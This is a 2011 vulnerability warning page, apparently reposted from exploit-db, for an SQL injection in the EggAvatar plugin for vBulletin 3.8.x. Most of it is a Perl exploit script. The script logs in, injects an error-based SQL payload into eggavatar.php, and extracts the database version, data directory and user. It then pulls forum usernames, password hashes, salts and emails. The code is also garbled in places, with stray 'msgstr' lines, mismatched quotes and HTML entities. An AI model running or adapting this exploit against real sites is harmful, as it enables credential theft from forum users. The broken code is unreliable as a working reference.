EggAvatar for vBulletin 3.8. x SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-03-09T00:00:00
ID MYHACK58:62201129662
Type myhack58
Reporter 佚名
Modified 2011-03-09T00:00:00

Description

vBulletin is a famous commercial Forum app for vBulletin 3.8. x EggAvatar plug-ins existSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ EggAvatar for vBulletin 3.8. x SQL Injection Vulnerability

[+]poc: ~~~~~~~~~

view source

print?

| 0 1 | #!/ usr/bin/env perl ---|---

0 2 | use LWP::UserAgent; ---|---

0 3 | sub banner{ ---|---

0 4 | print "###################################\n"; ` ---|---

0 5 | print "############ DSecurity############\n"; ` ---|---

0 6 | print "###################################\n"; ` ---|---

0 7 | print "# Email:dsecurity. vn[at]gmail.com #\n"; ` ---|---

0 8 | print "###################################\n"; ` ---|---

0 9 | } ---|---

1 0 | if(@ARGV<5){ ` ---|---

1 1 | print"Usage: $0 address username password number_user sleeptime\n"; ---|---

1 2 | print"Example: $0 <http://localhost/vbb> test test 1 0 1 0\n"; ---|---

1 3 | exit(); ---|---

1 4 | } ---|---

1 5 | $ua=LWP::UserAgent->new(); ` ---|---

1 6 | $ua->agent("DSecurity"); ` ---|---

1 7 | $ua->cookie_jar({}); ` ---|---

1 8 | sub login(@){ ---|---

1 9 | my$username=shift; ---|---

2 0 | my$password=shift; ---|---

2 1 | my$req= HTTP::Request->new(POST => $ARGV[0].'/ login. php? do=login"); ` ---|---

2 2 | $req-&gt;content_type('application/x-www-form-urlencoded"); ---|---

2 3 | $req-&gt;content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1 2 9 9 3 4 2 4 7 3-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf="); ---|---

2 4 | my$res= $ua->request($req); ` ---|---

2 5 | } ---|---

2 6 | sub v_request{ ---|---

2 7 | msgstr "" #Declare ` ---|---

2 8 | $print= $_[0]; ` ---|---

2 9 | $select= $_[1]; ` ---|---

3 0 | $from= $_[2]; ` ---|---

3 1 | $where= $_[3]; ` ---|---

3 2 | $limit= $_[4]; ` ---|---

3 3 | $sleep= $ARGV[4]; ` ---|---

3 4 | if($from eq") {$from= 'information_schema. tables";} ` ---|---

3 5 | if($where a eq") {$where= '1";} ` ---|---

3 6 | if($limit eq") {$limit= '0";} ` ---|---

3 7 | if($sleep eq") {$sleep= '1 0";} ` ---|---

3 8 | ---|---

3 9 | msgstr "" # Create a request ` ---|---

4 0 | my$req= HTTP::Request->new(POST => $ARGV[0].'/ eggavatar.php"); ` ---|---

4 1 | $req-&gt;content_type('application/x-www-form-urlencoded"); ---|---

4 2 | $req-&gt;content('do=addegg&securitytoken=1 2 9 9 3 4 2 4 7 3-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1"."' and (SELECT 1 FROM(SELECT COUNT(),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)3))foo FROM information_schema. tables GROUP BY foo)a)-- -'&uid=1&pid=1"); ---|---

4 3 | msgstr "" # Pass request to the user agent and get a response back ` ---|---

4 4 | my$res= $ua->request($req); ` ---|---

4 5 | #print $res->content; ` ---|---

4 6 | if($res-&gt;content =~ /(MySQL Error)(.*?)' (.*?) 0"(.*)/) ---|---

4 7 | {$test =$3}; ---|---

4 8 | sleep($sleep); ---|---

4 9 | return$print.$ test."\ n"; ---|---

5 0 | } ---|---

5 1 | &banner; ---|---

5 2 | print "\n############################################################################################################# \n"; ` ---|---

5 3 | print "# EggAvatar for vBulletin 3.8. x SQL Injection Vulnerability #\n"; ` ---|---

5 4 | print "# Date:06-03-2011 #\n"; ` ---|---

5 5 | print "# Author: DSecurity #\n"; ` ---|---

5 6 | print "# Software Link: &lt;http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html&gt; #\n"; ` ---|---

5 7 | print "# Version: 2.3.2 #\n"; ` ---|---

5 8 | print "# Tested on: vBulletin 3.8.0 #\n"; ` ---|---

5 9 | print "#############################################################################################################\ n"; ` ---|---

6 0 | ---|---

6 1 | #login ---|---

6 2 | login($ARGV[1],$ARGV[2]); ---|---

6 3 | #Foot print ---|---

6 4 | print v_request('MySQL version: ",'@@version"); ---|---

6 5 | print v_request('Data dir: ",'@@datadir"); ---|---

6 6 | print v_request('User: ",'user()"); ---|---

6 7 | print v_request('Database: ",'database()"); ---|---

6 8 | #Get user ---|---

6 9 | for($i=1;$i<=$ARGV[3];$i++){ ` ---|---

7 0 | print"-----------------------------------------\n"; ---|---

7 1 | print$id= v_request('ID: ",'userid",'user",'1",$i-1); ` ---|---

7 2 | if($id=~ /(ID:)\s(.*)/) { ` ---|---

7 3 | printv_request('Group: ",'usergroupid",'user",'userid=".$ 2); ` ---|---

7 4 | printv_request('Username: ",'username",'user",'userid=".$ 2); ` ---|---

7 5 | printv_request('Password: ",'password",'user",'userid=".$ 2); ` ---|---

7 6 | printv_request (the'Salt: ",'salt",'user",'userid=".$ 2); ` ---|---

7 7 | printv_request('Email: ",'email",'user",'userid=".$ 2); ` ---|---

7 8 | } ` ---|---

7 9 | ---|---

8 0 | } ---|---

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16934